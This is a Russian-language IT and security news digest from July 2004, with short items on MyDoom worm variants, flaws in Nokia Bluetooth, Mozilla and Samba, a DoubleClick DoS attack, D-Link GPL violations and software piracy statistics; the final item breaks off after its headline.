webplanet.ru

29/07/2004 13:18 МВД РФ раскрыло более 4 тыс. ИТ-преступлений
Начальник управления "К" МВД России Евгений Якимович сообщил, что за первое полугодие 2004 г. сотрудники его департамента выявили 4 тыс. 295 преступлений в сфере высоких технологий. Об этом сообщает РБК. Анализ данных преступлений показал, что 16% злоумышленников - это молодые люди в возрасте до 18 лет, 58% - от 18 до 25 лет, около 70% из них имеют высшее либо незаконченное высшее образование. Основная часть преступлений - это преступления, связанные с незаконным доступом к информации и с использованием вредоносных программ, отметил г-н Якимович.
cnews.ru

29/07/2004 13:17 Нападение хакеров на DoubleClick
Компания DoubleClick вчера подтвердила факт нападения хакеров на ее рекламный онлайн-сервис. Как сообщает News.com, атака также вызвала массовые прекращения работы ресурсов многих клиентов DoubleClick. Специалисты компании впервые заметили некоторые признаки DoS-атаки около 7 часов утра — она была направлена на систему DNS. Нападение, источник которого пока неизвестен, нарушило работу сайтов некоторых клиентов DoubleClick, сообщает News.com, ссылаясь на Дженнифер Блум (Jennifer Blum), пресс-секретаря компании. В настоящий момент почти все ресурсы снова функционируют в нормальном режиме, однако некоторые сервисы пока испытывают некоторые технические трудности.
webplanet.ru

29/07/2004 13:17 Касперский представил корпоративный антиспам 2.0
«Лаборатория Касперского» представила новое поколение семейства продуктов, разработанных для фильтрации нежелательной корреспонденции в корпоративных сетях и на уровне интернет-провайдеров — Kaspersky Anti-Spam Enterprise Edition 2.0 и KasperskyR Anti-Spam ISP Edition 2.0. Новое поколение семейства продуктов Kaspersky Anti-Spam, помимо улучшенной интеграции с различными почтовыми системами, включает в себя технологии, позволяющие успешно распознавать новые уловки спамеров: внедрение в письмо сложных графических элементов, многоступенчатую маршрутизацию сообщений для дезориентации анализа по «черным спискам», так называемые HTML-трюки (использование «невидимого» текста, удвоение букв и.т.п,).
webplanet.ru

29/07/2004 12:21 Nokia закрыла дыру в Bluetooth
Компания Nokia выпустила обновления для микропрограмм ряда своих телефонов, сообщает ZDNet. Дело в том, что ранее аппараты могли легко подвергнуться краже данных записной книжки и другой личной информации через Bluetooth, а некоторые модели телефонов могли использоваться злоумышленником еще шире - чтобы делать звонки, отправлять сообщения и изменять настройки. Несмотря на то что обнаружена эта уязвимость была около полугода назад, Nokia только сейчас объявила о выпуске патча. Ранее в компании заявляли о том, что проблема не столь важна и не требует немедленного решения. Специалисты Nokia делали упор на то, что для факта проникновения должно совпасть слишком многое: конкретная модель телефона, включенный и оставленный в режиме visible модуль Bluetooth, не слишком большое расстояние между жертвой и взломщиком, и наконец, желание взломщика нанести подобный ущерб. Обновления прошивок были выпущены для телефонов Nokia 6230, 6650, 6810, 6820 и 7200.
compulenta.ru

29/07/2004 11:31 MyDoom.M атакует Microsoft
Червь MyDoom.M, который также часто обозначается как MyDoom.O, после того как непреднамеренно затруднил работу поисковых систем (сбои происходили из-за того, что тысячи копий червя искали через поисковики адреса новых жертв), теперь, судя по сообщениям антивирусных компаний, принялся за настоящую атаку, жертвой которой избран сайт microsoft.com. Однако, несмотря на достаточно сильную распостраненность червя, сервер Microsoft неплохо выдержал распределенную атаку: по сообщению специалистов службы AlertSite, перебоев в работе microsoft.com не наблюдалось. Возникает вопрос: каким образом вирус, ранее не содержавший кода для выведения из строя какого-либо конкретного сайта, мог вдруг стать источником распределенной DoS-атаки? Ответ кроется в дополнительном вредоносном файле, встраиваемом в зараженную систему червем MyDoom.M и содержащем вирус Backdoor.Zincite.A. На компьютере, зараженном Zincite.A, открывался 1034-ый порт, отслеживая который, вирус ждал дальнейших команд. Именно этим и пользовался другой вирус, созданный, скорее всего, все той же командой хакеров, что и MyDoom - W32.Zindos.A. Zindos.A проникал на компьютеры, зараженные MyDoom и содержащие Zincite.A, с тем чтобы потом предпринять атаку на microsoft.com. Интересным фактом стало то, что для идентификации Zindos, предпринимаемой Zincite, использовался 128-битный ключ. Такая мера предосторожности говорит о том, что авторы вируса не хотели, чтобы зараженные компьютеры могли использовать другие вирусописатели в своих целях. Как поведет себя вирус дальше, пока не ясно. Количество зараженных компьютеров велико, и они вполне могут быть использованы для дальнейших атак. К тому же, некоторые специалисты утверждают, что Zincite.A до сих пор подробно не исследован и может содержать код для организации обмена данными о предыдущих жертвах между зараженными компьютерами. Такая сеть может представлять собой потенциальную угрозу новой волны заражения или распостранения других вредоносных программ.
compulenta.ru

29/07/2004 11:22 Подробности об антивирусном ПО Microsoft
Самостоятельный антивирусный продукт будет создан на основе тех инструментов, которые Microsoft унаследовала в 2003 году при покупке компаний GeCad и Pelican Software. Представители Microsoft в США отказались говорить о функциональных элементах или назвать возможное время выпуска антивирусного пакета. Однако Никола Мирай (руководитель секьюрити-проекта Microsoft во Франции) уточнил, что антивирусное ПО Microsoft будет использовать два разных средства обнаружения поврежденных файлов, первое из которых для обнаружения потенциальных инфекций будет обращаться к регулярно обновляемому перечню известных вирусов. Второй антивирусный инструмент будет анализировать компьютерные системы, определяя, не были ли они поражены вирусом в прошлом, и давать конечным пользователям представление о том, в какой степени их компьютеры подвержены новым проблемам. Когда Microsoft купила румынскую компанию GeCad, она объявила это первым шагом своей инициативы Trustworthy Computing, нацеленным на защиту почти двух третей (по оценке Microsoft) пользователей Windows, не имеющих на своих компьютерах современного антивирусного ПО. Тогда компания говорила, что она, возможно, откроет основанный на подписке платный сервис для пользователей Windows.
zdnet.ru

29/07/2004 11:19 D-Link нарушает лицензию GPL
Как сообщает nixp.ru, выявлено несколько случаев строгого нарушения фирмой D-Link лицензии GNU GPL (General Public License). В первом случае выяснилось, что в своих бюджетных роутерах (DI-614+, DI-624+…) D-Link использует программу с открытым исходным кодом l2tpd (Layer 2 Tunnelling Protocol Daemon). Второе нарушение связано с оборудованием серии «Т». Одним из важнейших компонентов встроенной операционной системы для этих устройств является пакет программ BusyBox. BusyBox распространяется по лицензии GPL и требует дальнейшего предоставления исходного кода к прошивкам. В противном случае использование пакета запрещено. Используя программы с открытым кодом, распространяющиеся по GNU GPL (и ряду других публичных лицензий) и не предоставляя при этом исходного кода к прошивкам, создатели оборудования по сути занимаются воровством интеллектуальной собственности у тысяч разработчиков. Признав всю серьезность сложившейся ситуации и возможные последствия, многие производители сетевого оборудования в прошлом и этом году опубликовали исходные коды прошивок к соответствующим моделям. Netgear, Linksys, US Robotics, Belkin, Buffalo Technology, Asus, Actiontec, Trendnet — это далеко не полный список компаний, решивших «играть по правилам». На сегодняшний день D-Link является единственной фирмой крупного масштаба, не желающей выполнять требования GPL и скрывающей факт использования открытых проектов в своих системах. Приведенные факты были переданы на детальное изучение Фонду Свободного ПО (Free Software Foundation), также были поставлены в извесность авторы упомянутых проектов. В ближайшее время должны увидеть свет статьи, посвещенные затронутой теме в ряде компьютерных изданий в Европе и Америке.
nixp.ru

29/07/2004 11:10 Ошибка в браузере Mozilla
Веб-серферам, которые в качестве безопасной альтернативы рассматривают браузеры на базе Mozilla, лучше отложить переход еще на неделю. Дело в том, что Mozilla Foundation, группа разработчиков браузера с открытым исходным кодом, обнаружила пару серьезных ошибок в механизме работы браузеров с сертификатами — цифровыми документами, подтверждающими подлинность веб-сайтов. Инженеры Mozilla оказались застигнутыми врасплох, так как проблемный код восходит еще к проприетарному предку браузера — Netscape. «Этому коду шесть или семь лет, так что все серьезные баги выловлены еще во времена Netscape 4.0, — говорит главный инженер Mozilla Foundation Крис Хофманн. — Мы давно не находили там ничего серьезного и очень удивились». Ошибки управления сертификатами всплыли в неудачное для проекта время: специалисты по безопасности как раз продвигают браузеры Mozilla Foundation и Opera в качестве более надежной альтернативы доминирующему программному обеспечению Microsoft Internet Explorer. Хотя Mozilla и другие конкуренты IE утверждают, что их модель защиты гораздо надежнее, они признают также, что на Microsoft нацелено больше атак просто потому, что это лидер рынка. Если же Mozilla и другие второстепенные браузеры обретут популярность, ситуация может измениться. Информация о первой из двух обнаруженных ошибок опубликована в вебе и списке рассылки Bugtraq Эммануэлем Келлинисом. Она позволяет злоумышленнику заманить посетителя на подложный веб-сайт якобы банка или крупной компании, подделав сертификат. Проблема связана с работой стандартного механизма извлечения контента из веб-сайтов, которые пользователь еще не посещал. Обычно, когда контент защищенного веб-сайта вовлекается в такие схемы с участием постороннего сайта, он забирается в кэш браузера, и тот предупреждает об этом пользователя, заменяя значок ключа значком сломанного ключа. Однако ошибка в системе кэширования Mozilla допускает возможность сохранения ключа несломанным даже при импортировании контента с других сайтов и отображения сайта злоумышленника с сертификатами защиты подлинного сайта. Таким образом, злоумышленник может убедительно выступать от лица eBay или Bank of America, воруя кредитные карты или реализуя мошеннические схемы. Вторая, менее серьезная ошибка обнародована через собственную систему отслеживания багов Mozilla Bugzilla и позволяет организовывать атаки типа denial-of-service. Из-за этой ошибки фальшивый сертификат может вызывать искажение подлинного. В результате посетителю подлинного сайта будет отказано в доступе. В Mozilla пока не решили, выпускать ли отдельные поправки или просто включить их в будущие версии браузеров. Последними версиями браузеров на базе Mozilla являются Mozilla 1.7.1 и Firefox 0.9.2. Ожидается, что исправления или новые версии браузеров появятся примерно через неделю.
zdnet.ru

29/07/2004 10:43 Microsoft выпустила обновление Office
Во вторник Microsoft выпустила первое крупное обновление Office 2003.
SP1 для Office 2003 доступен для загрузки с веб-сайта MS Office Update. Пакет устраняет ошибки и улучшает стабильность работы основных компонентов комплекса, таких как текстовой процессор Word и программа e-mail Outlook, а также вносит некоторые более существенные изменения и дополнения в новые приложения. Наиболее заметные изменения в SP1 относятся к программе подготовки электронных форм InfoPath и программе составления заметок OneNote. Основываясь на отзывах пользователей и результатах тестирования, Microsoft внесла существенные изменения во внешний вид и способ функционирования этих приложений. Поправки, внесенные в основные приложения Office, такие как Word и Excel, имеют более скрытый характер и сосредоточены на повышении стабильности и производительности, отметила директор по службам управления и обновления Office Джинна Шелдон. «Что касается основных приложений, то заказчики уже привыкли к определенным приемам работы с ними. Мы не хотим вносить в промежуточных релизах изменения, которые заставят их переучиваться». «Мы обработали ту информацию, которую получили от заказчиков, — сказала Шелдон. — Мы распределяем отчеты по задействованным компонентам и ветвям кода, в которых происходят сбои — и выходим непосредственно на чувствительные точки… В результате нам удалось повысить надежность продукта по целому ряду разных параметров примерно в семь раз». Примечание: на момент опубликования новости SP1 на русском языке недоступен для загрузки.
zdnet.ru

29/07/2004 10:38 Mydoom замедлил работу поисковых машин
Как сообщает news.com, новая версия червя Mydoom - Mydoom.m, сразу после своего появления в интернете замедлила работу популярных поисковых машин: Google, Yahoo!, AltaVista и Lycos. Замедление работы поисковых машин связано с тем, что червь заставляет автоматически обращаться к ним интернет-браузеры. По данным компании MessageLabs, занимающейся мониторингом электронного почтового трафика, в первые пять часов после обнаружения Mydoom.m было перехвачено более 23 тыс. зараженных писем. «Данный червь использует своеобразный и уникальный способ сбора адресов для рассылки зараженных писем. До сих пор нечто подобное было применено в черве Swen, когда он рассылал себя в группы новостей, запрашивая предварительно список доступных групп, - комментирует антивирусный эксперт «Лаборатории Касперского» Александр Гостев. - Что же касается проблем в работе различных поисковых систем, то, кажется, никто кроме Google о них не сообщал. В любом случае, следует учесть, что Google в штатном режиме ежедневно обслуживает более 200 млн поисковых запросов. Вряд ли в интернете существует достаточное количество зараженных Mydoom.m компьютеров, чтобы вывести из строя подобную систему». После своей установки червь сначала ищет почтовые адреса для рассылки зараженных писем на жестком диске пораженного компьютера, а затем расширяет зону поиска через поисковые машины. Предыдущие версии червя подобных запросов не осуществляли. С помощью поисковых машин червь обнаруживает все опубликованные электронные адреса, зарегистрированные в одном домене с адресом зараженного компьютера.
viruslist.ru

29/07/2004 10:22 I-Worm.Mydoom.m
"Лаборатория Касперского" предупреждает о появлении в интернете новой разновидности почтового червя Mydoom, получившей версию "m". Червь распространяется по электронной почте в качестве вложений в зараженные электронные письма. Зараженные письма червь пытается подделывать под сообщения об ошибках от различных почтовых систем (например, сообщения об ошибках доставки).
viruslist.ru

24/07/2004 18:49 Технология SPF — за и против
"Вебпланета" опубликовала материал по названием "Технология SPF — за и против". В статье анализируется антиспам-технология SPF (Sender Policy Framework), ее основные свойства, достоинства и недостатки. Помимо теоретического анализа, описан опыт практического использования этой технологии в имеющихся на сегодняшний день условиях.
Статья

24/07/2004 18:48 Бен Ладен наносит ответный удар
Файлы, в которых, якобы, содержатся доказательства того, что пресловутый Осама бен Ладен покончил жизнь самоубийством, на самом деле несут в себе обычного троянца. Как сообщает пресс-служба компании Sophos, ссылки на зараженные вирусом Hackarmy файлы уже размещены на множестве сетевых форумов. Как правило, автор реплики, в которой содержится соответствующая ссылка, утверждает, что в начале этой недели журналисты телекомпании CNN нашли Осаму бен Ладена повешенным. В качестве доказательства он приводит ссылку на некий файл, в котором, дескать, находятся фотографии с изображением мертвого тела террориста №1. Излишне любопытные читатели, клюнувшие на хитрость неизвестного хакера, устанавливают себе троянскую программу, которая используется для захвата контроля над его компьютером.
internet.ru

24/07/2004 18:48 В Россию пришел новый охотник за вирусами
ЗАО «Софткей» и компания Trend Micro заключили соглашение о дистрибуции электронных версий антивирусного программного обеспечения через интернет-магазин SoftKey.ru. Таким образом, впервые электронные версии антивирусных решений компании Trend Micro представлены в России. Основанная в 1988 году Стивом Чангом, компания на сегодняшний день является одним из лидеров в сфере разработки антивирусного программного обеспечения для корпоративных пользователей. ЗАО «Софткей» начинает продажи программного обеспечения Trend Micro c электронной версии антивируса Trend Micro™ PC-cillin™ Internet Security 2004. Эта программа, представляющая собой систему защиты от вирусов, хакерских атак и других опасностей.
internet.ru

24/07/2004 18:48 Пиринговые сети будут окончательно запрещены
Председатель сенатской комиссии США по юридическим вопросам господин Оррин Хатч заявил о том, что «существует настоятельная необходимость» полного запрета любых p2p-сетей. Впрочем, с некоторыми оговорками. Оговорки, как пишет CNET, включают в себя соблюдение интересов ряда крупных компаний, вложившихся в создание легальных пиринговых сетей. В первую очередь, речь идет о компании Apple, чей mp3-флагман iPod добился своих нынешних позиций не только за счет правильного интерфейса, но и благодаря музыкальному сервису iTunes.
internet.ru

24/07/2004 18:48 Cisco выпустила оборудования для защиты от распределенных атак
Компания Cisco, известный поставщик сетевого оборудования, объявила, что в рамках ее стратегии "самозащищающейся сети" были предложены новые решения для защиты от вирусов, червей и хакерских атак. Cisco представила два новых устройства: Cisco Traffic Anomaly Detector XT 5600 и Cisco Guard XT 5650. Traffic Anomaly Detector предназначен для выявления угроз безопасности. По заявлению Cisco, устройство с большой точностью обнаруживает известные и неизвестные виды атак DDoS и автоматически оповещает Cisco Guard, который предназначен для их предотвращения.
compulenta.ru

24/07/2004 18:47 2 Гб по ошибке
Некоторые новые пользователи бесплатного почтового сервиса Hotmail были приятно удивлены, когда после регистрации увидели, что им выделены почтовые ящики объемом 2 ГБ. Это в тысячу раз больше, чем стандартный размер почтового ящика в 2 МБ, который выдается каждому новому пользователю. В четверг, 22 июля, представители Microsoft официально сообщили, что это была ошибка. Самый старая в интернете бесплатная почтовая служба просто «глюканула» по причине того, что Microsoft сейчас активно расширяет почтовые ящики платных подписчиков. Как известно, те пользователи, которые платят $19.95 в год, получают на Hotmail почтовые ящики в тысячу раз большего объема. Эти ящики по ошибке получили и некоторые пользователи бесплатной службы. К сожалению для них, Microsoft пообещала в ближайшее время изменить объем ящиков обратно к 2 МБ. Пользователи смогут порадоваться большому количеству свободного места только через несколько месяцев, когда лимит будет увеличен до 250 МБ. В последнее время все почтовые сервисы друг за другом увеличивают размер ящиков. Эта «истерия» началась, когда Google анонсировала сервис Gmail (1 ГБ). Пережив шок, рынок отреагировал: Yahoo увеличила бесплатные ящики до 100 МБ, а платные — до 2 ГБ, а потом и Microsoft анонсировала увеличение бесплатных до 250 МБ, а платных — до 2 ГБ.
webplanet.ru

24/07/2004 18:47 Microsoft "накрыл" крупнейшего пирата в Европе
Распространитель программных продуктов из Германии отправится в тюрьму на пять с половиной лет: такое наказание он понесет за спекуляции с ПО от Microsoft. Предприимчивый дилер менял упаковки коробочных версий дешевых продуктов, предназначенных для учебных заведений, и продавал их за более высокую цену.
По словам представителя суда г. Бохум, Ральф Блашек (Ralph Blasek), распространитель программного обеспечения из г. Виллих (Германия), переупаковал более 32 тыс. комплектов программных продуктов, предназначенных для учебных заведений, и продал их через собственную компанию Dino-Soft, «нагрев» крупнейшего мирового производителя ПО на €4,5 млн. ($5,7 млн.). Суд проявил некоторое снисхождение — обвинение требовало осудить дилера на все шесть лет, сообщает Reuters.
cnews.ru

24/07/2004 18:46 Microsoft собирается включить проверку Sender ID
Microsoft намерена ввести обязательную проверку подлинности отправителей для все почты, приходящей на поддерживаемые компанией почтовые адреса. Это не только корпоративные адреса в домене microsoft.com, но и почтовые ящики пользователей MSN и бесплатной почтовой службы MSN Hotmail. Проверка длинности отправителя будет вестись с помощью технологии Sender ID. Sender ID позволяет установить подлинность отправителя путем сопоставления IP-адреса, с которого было отправлено письмо, с IP-адресом, соответствующим домену, в котором находится заявленный адрес отправителя. Письма с поддельными адресами в этом случае можно будет отбросить. Чтобы обеспечить беспрепятственное прохождение почты на свои адреса, Microsoft рекомендует всем провайдерам электронной почты реализовать обеспечить поддержку Sender ID до конца сентября. Впрочем, письма с серверов без поддержки Sender ID не будут отбрасываться. Однако, в отличие от писем с Sender ID, им придется проходить через фильтры спама, основанные на статистических алгоритмах. Sender ID уже поддерживают некоторые почтовые службы. В частности, недавно о поддержке Sender ID объявила компания "Яндекс".
compulenta.ru

24/07/2004 18:46 «Черный рынок» музыкальных CD достиг невиданных масштабов
Глобальный «черный рынок» музыкальных CD достиг невиданных масштабов. За 2003 год продано 1,1 млрд пиратских компактов. Каждый третий CD в мире был изготовлен нелегально. Это новый рекорд. По информации Международной федерации фонографической индустрии (IFPI), в результате деятельности пиратов корпорации-правообладатели недосчитались $4.5 млрд. Это рекордная сумма «убытков» за все время существования музыкального рынка. Как сообщается в отчете IFPI, производство пиратских компакт-дисков превратилось в развитую коммерческую индустрию, на которую работают крупные заводы в странах Восточной Европы, Латинской Америки и Юго-Восточной Азии. В своем отчете IFPI клеймит позором 10 стран, которые признаны самыми злостными вредителями: это Бразилия, Испания, Китай, Мексика, Пакистан, Парагвай, Россия, Тайвань, Тайланд и Украина. По объему пиратского рынка среди стран этого списка лидируют Китай ($600 млн) и Россия ($330 млн). Председатель IFPI обращается к правительствам этих стран с призывом принять меры для решения проблемы.
webplanet.ru

24/07/2004 18:45 О некоторых политических аспектах компьютерного пиратства
Crime-research.ru опубликовал новый материал посвященный политическим аспектам компьютерного пиратства. В настоящее время практически в каждом "компьютерном" издании можно встретить статьи, посвящённые так называемому компьютерному пиратству - незаконному распространению копий программ, защищённых авторским правом. Большинство таких статей безоговорочно выступают в защиту авторского права производителя. В дискуссиях среди пользователей же преимущественно царят настроения в поддержку пиратства, а многие даже считают несоблюдение авторских прав само собой разумеющимся. Анализ доступных авторам публикаций на эту тему показал, что по данному вопросу до сих пор не высказывались экономисты и политики. Разговор в основном ведут специалисты-компьютерщики, менеджеры специализированных компаний, а также простые пользователи. Эти и другие проблемы а также все "за" и "против" в области компьютерного пиратства освещаются в данном материале.
Читать

24/07/2004 18:45 Более 36% программного обеспечения является пиратским
Более 36% программного обеспечения, используемого во всем мире, является пиратским, в результате чего эта отрасль в 2003 году недополучила 29 млрд. долларов. Об этом говорится в исследовании, проведенном фирмой International Data Corporation по заказу Альянса изготовителей коммерческого программного обеспечения. В прошлом году от действий пиратов наиболее пострадали компании, выпускающие лицензионное программное обеспечение в Западной Европе, где убытки составили почти 9,6 млрд. долларов США. Следом идут Азия и Северная Америка. В частности, в Азии убытки составили 7,5 млрд. долларов, в США и Канаде – 7,2 млрд. долларов. В целом же, в 2003 году на все компьютеры мира было установлено программное обеспечение общей стоимостью почти 80 млрд. долларов, однако при этом, стоимость программного обеспечения, приобретенного законным путем, составила лишь 50 млрд. долларов. Наиболее высокие пиратские рейтинги у Китая и Вьетнама. В соответствии с исследованиями BSA и IDC, почти 92% всего программного обеспечения, установленного на компьютеры, в этих странах является контрафактным. Далее идут Украина – 91%, Индонезия – 88%, Россия и Зимбабве – 87%. Разработчики программного обеспечения требуют от правительств этих стран принять меры, направленные на борьбу с пиратством. BSA также представила подобную статистику о количестве пиратской продукции в различных регионах: в Азии пиратскими являются 53% всех установленных программ, в восточной Европе – 70%, в Латинской Америке – 63%, на Ближнем востоке – 55%, в Западной Европе – 36%, в Северной Америке – 23%.
crime-research.ru

23/07/2004 14:00 Две уязвимости в Samba
Secunia сообщает об двух обнаруженных уязвимостях в Samba 2.x и Samba 3.x. Первая уязвимость возникает из-за ошибки при проверке границ буфера при декодировании из base64. Вторая - при обработке "mangling method = hash". Обе уязвимости вызывают переполнение буфера, что позволяет выполнить произвольный код на уязвимой машине. Первая уязвимость подтверждена в Samba 3.0.2 - 3.0.4., вторая в Samba 3.0.0 - 3.0.4 и Samba 2.2.9 и более ранних. Обе ошибки исправлены в версии 3.0.5, вторая ошибка исправлена также в версии 2.2.10. Уязвимости обнаружил Evgeny Demidov.
samba.org, secunia.com.

23/07/2004 13:59 В сети появилась новая модификация червя MyDoom
Антивирусная компания Sophos объявила о появлении в сети новой модификации червя Mydoom - W32/MyDoom-N. Червь содержит код для отправки почтовых сообщений и распостраняется при помощи массовой рассылки зараженных писем. Недальновидные пользователи, запустившие исполняемый файл, пришедший по почте и содержащий вирус подвергают свой компьютер опасности стать источником дальнейшего распостранения червя или почтовых сообщений рекламного характера. После активизации MyDoom-N копирует свой код в папку Windows под именем lsass.exe, добавляет ссылку на него в раздел автозапуска системного реестра Windows, делает возможным доступ к компьютеру извне и продолжает свое распостранение.
compulenta.ru, sophos.com

23/07/2004 13:58 Хакеры напали на сайт военного информационного агентства Тайваня
Сайт информационного агентства Вооруженных сил Тайваня в ночь на понедельник подвергся хакерской атаке. К ее организации, вероятно, причастны хакеры из Китая, сообщает агентство France Presse. В результате кибернападения военное руководство вынуждено было закрыть атакованную веб-сайт. На его главной странице хакеры разместили надпись «Объединение с Тайванем в 2021 году». Похожую атаку на сайт партии тайваньского президента Чен Шуйбяня китайские хакеры провели около месяца назад. Хакерское нападение на тайваньский военный веб-ресурс произошло всего за два дня до плановых учения ВВС страны.
viruslist.ru

23/07/2004 13:57 Первая русскоязычная VoIP-конференция
В русскоязычном радиолюбительском EchoLink-интернет-сообществе создана первая специальная русскоязычная голосовая радиолюбительская VoIP конференция *RUSSIA*. Конференция создана 16 июля 2004 года силами RV3DHC и UA9OTY на сервере Qrz.Ru, сообщает Nag.Ru. Максимальное число участников конференции — до 500. Сервер находится в Москве, провайдер — «Евразия-Телеком».
webplanet.ru

23/07/2004 13:57 Dell научит пользователей постоять за себя
Компания Dell объявила о намерении давать своим клиентам уроки защиты компьютеров от спама, вирусов и шпионских программ, сообщает сайт News.com. По словам сотрудников Dell, около 20% звонков, поступающих в службу поддержки компании, связаны с вирусными и шпионскими программами. Число вирусных инцидентов растет одновременно с числом пользователей, подключающихся к интернету через беспроводные и выделенные каналы. В помощь пользователям Dell открыла раздел PC Security на своем сайте, который поможет пользователям распознавать онлайновые угрозы и находить способы их устранения. Кроме того, компания намерена наладить сотрудничество с фондом интернет-образования (Internet Education Foundation). Пользователи, которые не смогут устранить проблемы в области компьютерной безопасности смогут получить платную помощь.
viruslist.ru

23/07/2004 13:56 Взломана маркетинговая база данных компании Acxiom Corporation
Сорокапятилетний американец обвиняется во взломе одной из крупнейших в мире баз данных, принадлежащей маркетинговой компании Acxiom Corporation. Хакеру, владельцу спамерской компании Snipermail, предъявлено обвинение в несанкционированном и мошенническом доступе в защищенный компьютер, отмывании денег и препятствовании осуществлению правосудия. Обвиняемый и другие работники Snipermail взломали базу данных компании Acxiom Corporation, содержащую персональную, финансовую и корпоративную информацию, и продавали списки адресов электронной почты маркетинговым фирмам для проведения спамерских рассылок. В период с апреля 2002 года по август 2003 года было насчитано 139 случаев нелегального доступа и скачано 8,2 Гб информации с сервера Acxiom.
compulenta.ru

23/07/2004 13:56 McAfee откроет антивирусный центр в Индии
Антивирусная компания McAfee откроет центр слежения за вирусной активностью в индийском городе Бангалор, сообщает Associated Press. Укомплектованный из местных исследователей, он будет координировать работу мониторинговых команд в 11 городах разных стран, в основном в Европе. В настоящее время западная часть азиатско-тихоокеанского региона не покрыта сетью слежения за вирусами: с запада ближайший расположен в Европе, а с востока - в Сингапуре. Бангалор был выбран как ИТ-узел Индии. По всему миру McAfee задействовала 100 исследователей, занятых ловлей вирусов и обнаружением атак. Благодаря этому "компьютерному спецназу," компания может остановить эпидемию за час, как утверждает Болин. Не стоит путать их с программистами, пишущими продукт: на создание антивирусной программы в McAfee работает 600 человек, из которых половина находится в Бангалоре, где центр разработки был открыт два года назад. Неизвестно, сколько человек будут работать в новом мониторинговом офисе. Индия уже давно зарекомендовала себя как страна с хорошими и недорогими программистами и исследователями. Годовой оборот от аутсорсинга в этой стране достигает $12,5 млрд.
cnews.ru

23/07/2004 13:44 Symantec рапортует о двух новых вирусах
Symantec сообщила сегодня о двух новых вирусах. W97M.Kuna - макровирус, поражающий документы Microsoft Office и шаблон Normal.dot. Вирус также отключает некоторые функции Microsoft Word и выдает разнообразные сообщения. Уровень опасности Kuna отмечена как "низкий". Второй вирус - чуть более опасный троян Backdoor.Agent.B, поражающий dll-файлы и собирающий информацию о зараженной машине.
compulenta.ru

22/07/2004 15:12 "Антивирус Касперского" интегрирован в семейство межсетевых экранов eSys
"Лаборатория Касперского", российский разработчик систем антивирусной защиты, заключила соглашение с австрийской компанией eSys о внедрении специальной ОЕМ-версии "Антивируса Касперского" для Linux в продуктовую линейку межсетевых экранов Gibraltar. Межсетевые экраны Gibraltar являются высокопроизводительным программно-аппаратным комплексом для обеспечения безопасности корпоративных сетей средних и крупных предприятий. Заключенное соглашение позволит компани eSys расширить функциональность межсетевого экрана и представить на рынке комплексное решение, сочетающее в себе антивирусную безопасность, сетевую защиту, поддержку технологии VPN, обнаружение и блокирование несанкционированного доступа.
compulenta.ru

22/07/2004 15:12 Sun перенесет ОС Solaris на другие процессорные платформы
Компания Sun Microsystems намерена расширить сферу применения своей операционной системы Solaris. В течение последних нескольких лет эта Unix-подобная система поддерживала только собственную процессорную архитектуру Sun UltraSparc. Однако в 2003 году компания возобновила разработку Solaris для платформы x86 и объявила о намерении выпустить версию этой ОС для процессоров AMD Opteron, сочетающих 32-разрядную систему команд x86 с 64-разрядными расширениями. Теперь в Sun решили пойти еще дальше и выпустить Solaris для процессоров, напрямую конкурирующих с UltraSparc. Как сообщает издание CNET News, в перспективе, Solaris может заработать на процессорах семейства IBM Power и даже на горячо нелюбимых Sun процессорах Intel Itanium. По словам операционного директора Sun Джонатана Шварца, у компании на этот счет очень серьезные намерения. Более того, Шварц отметил, что в исследовательских лабораториях компании уже создана версия Solaris, работающая на серверах с процессорами Itanium.
compulenta.ru

22/07/2004 15:09 Австралия рапортует об успехах в борьбе со спаммерами
Как сообщает AFP, австралийский опыт борьбы со спамом с помощью жестоких штрафов (до 780 тысяч долларов в день), доказывает эффективность этой тактики и может быть распространен на другие страны мира. По крайней мере, так считает австралийское Министерство коммуникаций. Как заявил глава телекоммуникационного ведомства Боб Хортон (Bob Horton), принятый в апреле этого года пакет законов был направлен на борьбу с крупными спаммерами, распространяющими рекламу особо «популярных» в народе продуктов, вроде порнографии и «травяной виагры». Несмотря на весьма скептические настроения экспертов, закон, похоже оказался достаточно эффективным. По крайней мере, как утверждает господин Хортон, в последнее время его ведомство практически не получает жалоб на бесчинства сетевых маркетологов.
internet.ru

22/07/2004 15:09 ICANN включила поддержку IPv6
Как сообщает агентство Reuters, неправительственная организация ICANN, включила, наконец, поддержку шестой версии интернет-протокола на своих рутовых серверах. По словам руководства ICANN, этот шаг был сделан в ответ на стремительно растущую нагрузку на сетевую инфраструктуру, в следствие чего постоянно растет и риск ее глобального сбоя. Кроме того, как хорошо известно, рост спроса на интернет в странах Юго-восточной Азии, в которой живет уже половина всего сетевого населения, обостряет проблему дефицита в выделенном ей весьма ограниченном диапазоне IP-адресов. Как говорит сам Серф, на сегодняшний день заняты примерно две трети из 4,2 млрд. возможных IP-адресов, доступных в рамках ныне используемого интернет-протокола четвертой версии. Ввод в строй оборудования, поддерживающего IPv6, позволит увеличить емкость адресного пространства в «25000 триллионов триллионов раз». Однако по мнению Серфа, IPv6 придется тестировать еще около двадцати лет, прежде чем разработчики смогут точно сказать, что система более-менее работоспособна.
internet.ru

22/07/2004 15:09 DoS уязвимость в Cisco
Secunia сообщает о новой уязвимости в Cisco ONS 15000 благодаря которой возможно проведение DoS атаки или обход аутентификации. О обнаруженных уязвимостях сообщала Cisco. Атака возможна из локальной сети. Опасность - "не критичная". Оригинальное сообщение "Cisco ONS 15327, ONS 15454, ONS 15454 SDH, and ONS 15600 Malformed Packet Vulnerabilities" здесь.
Источник: secunia.com

22/07/2004 15:08 Компьютерные преступления в уголовном законодательстве стран СНГ
crime-research.ru сообщает, в библиотеку сайта Центра исследования компьютерной преступности добавлен обновленный материал (выписка из уголовных кодексов СНГ и Прибалтики) по ответственности за совершение преступлений в сфере компьютерной информации, предусмотренная уголовным законодательством стран СНГ и Прибалтики.
Подробнее : crime-research.ru

22/07/2004 15:07 В России поймали хакеров, атаковавших британских букмекеров
